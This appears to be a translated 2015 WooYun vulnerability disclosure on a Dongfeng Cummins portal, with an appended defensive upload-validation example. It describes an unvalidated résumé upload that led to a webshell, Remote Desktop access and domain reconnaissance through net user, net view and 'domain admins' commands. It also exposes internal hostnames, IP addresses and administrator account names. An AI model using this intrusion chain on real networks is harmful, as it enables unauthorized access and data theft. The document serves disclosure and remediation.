Vulnerability summary

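Bug ID: wooyun-2015-093515

Title: Dongfeng Cummins Engine Co., Ltd. portal website: a vulnerability leads to getshell and intranet roaming

Vendor: Dongfeng Cummins (东风康明斯)

Author: 爱上襄阳

Submitted: 2015-01-23 17:36

Fixed: 2015-03-09 17:38

Publicly disclosed: 2015-03-09 17:38

Vulnerability type: Successful intrusion incident

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org (for questions or help, contact [email protected])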



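Vulnerability details

Disclosure status:

2015-01-23: Details reported to the vendor; awaiting vendor handling
2015-01-28: Vendor confirmed; details disclosed to the vendor only
2015-02-07: Details disclosed to core white hats and experts in related fields
2015-02-17: Details disclosed to regular white hats
2015-02-27: Details disclosed to intern white hats
2015-03-09: Details disclosed to the public

Brief description:

Dongfeng Cummins Engine Co., Ltd. portal website: a vulnerability leads to getshell and intranet roaming

Detailed description:

The Dongfeng Cummins Engine portal website

[Screenshot]


On the job application page, the résumé upload performs no server-side validation, so the upload succeeds after modifying the request packet

[Screenshot]


A webshell was obtained

[Screenshot]


[Screenshot]


Remote Desktop connection to the portal web server:

[Screenshot]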


Proof of vulnerability:

Network adapter information:
Windows IP Configuration
Host Name . . . . . . . . . . . . : dcecssy057t
Primary Dns Suffix . . . . . . . : dcec.easia.cummins.com
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dcec.easia.cummins.com
easia.cummins.com
cummins.com
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Virtual Machine Bus Network Ada
pter #2
Physical Address. . . . . . . . . : 00-15-5D-00-C9-34
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.113.57
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 192.168.112.1
DNS Servers . . . . . . . . . . . : 192.168.112.26
192.168.112.27


Domain user list:

net user /domain   (domain user list)
这项请求将在域 dcec.easia.cummins.com 的域控制器处理。
\\DCECDC4.dcec.easia.cummins.com 的用户帐户
-------------------------------------------------------------------------------
命令成功完成。


List the domains present on the intranet:

C:\Documents and Settings\zz799>net view /domain
Domain
------------------------------------------------------
ATPU
DCEC
DCEC_ISBE
DCECSPC
MSHOME
SYSTECH
SYTECH
WORKGROUP
ZJSOFT
命令成功完成。


Obtain the list of domain administrators:

C:\Documents and Settings\zz799>net group "domain admins" /domain
这项请求将在域 dcec.easia.cummins.com 的域控制器处理。
组名 Domain Admins
注释 Designated administrators of the domain
成员
-------------------------------------------------------------------
ccaad cummin5adm1n dadmin
dadmin.app dadmin.gao dcecadmin
mstech
命令成功完成。


List the computers on the intranet:

C:\Documents and Settings\zz799>net view
服务器名称 注释
---------------------------------------------
命令成功完成。


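The domain controller administrator's account and password were obtained by some means, allowing arbitrary logins and free roaming of the intranet

[Screenshot]


Logged in to the CRM system, as shown in the screenshot above; related sensitive information:

[Screenshot]


Remediation:

A vulnerability at the perimeter led to the intranet being penetrated and freely roamed. The vendor should patch it as soon as possible; there is too much sensitive information.

Copyright notice: when reposting, please credit the source 爱上襄阳@乌云 (WooYun)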
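The root cause reported above is an upload check that exists only in the browser, so it disappears once the request is modified. As an added example (not code from the original report or from the affected site), here is a server-side check for a résumé upload; the PDF/DOCX allow-list, the size limit and all function names are assumptions.

```python
import io
import re
import secrets
import zipfile

MAX_BYTES = 5 * 1024 * 1024  # assumed size limit
# Assumed policy: a résumé is a PDF or DOCX. The client-supplied name may contain
# only word characters, '-' and spaces, followed by exactly one dot and extension.
NAME_RE = re.compile(r"[\w\- ]{1,100}\.(pdf|docx)", re.IGNORECASE)


class UploadRejected(Exception):
    """Raised when an upload fails a server-side check."""


def content_matches(ext, data):
    """Check that the bytes look like the format the extension claims."""
    if ext == "pdf":
        return data.startswith(b"%PDF-")
    try:  # a DOCX is a ZIP archive containing word/document.xml
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return "word/document.xml" in z.namelist()
    except zipfile.BadZipFile:
        return False


def accept_resume(client_name, data):
    """Validate on the server; return a server-generated storage name."""
    base = re.split(r"[\\/]", client_name)[-1]  # drop any client-side path
    m = NAME_RE.fullmatch(base)
    if m is None:
        raise UploadRejected("file name or extension not allowed")
    if not 0 < len(data) <= MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    ext = m.group(1).lower()
    if not content_matches(ext, data):
        raise UploadRejected("content does not match extension")
    # The client-chosen name is never reused: random name, allow-listed extension.
    return f"{secrets.token_hex(16)}.{ext}"


def sample_docx():
    """Constructed minimal DOCX-like archive, used as sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()
```

The returned name is meant to be written to a directory outside the web root that the web server is configured never to execute scripts from.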


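Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-01-28 10:25

Vendor reply:

CNVD confirms the vulnerability as described. A direct handling channel with the organization that manages the website has not yet been established; awaiting claim.

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-05-15 16:26 | 雏鹰 (Passerby | Rank: 2, Vulnerabilities: 1 | Following what happens on the Internet, following web security, following sec...)

    Learned something. After getting the webshell, how do you enable Remote Desktop?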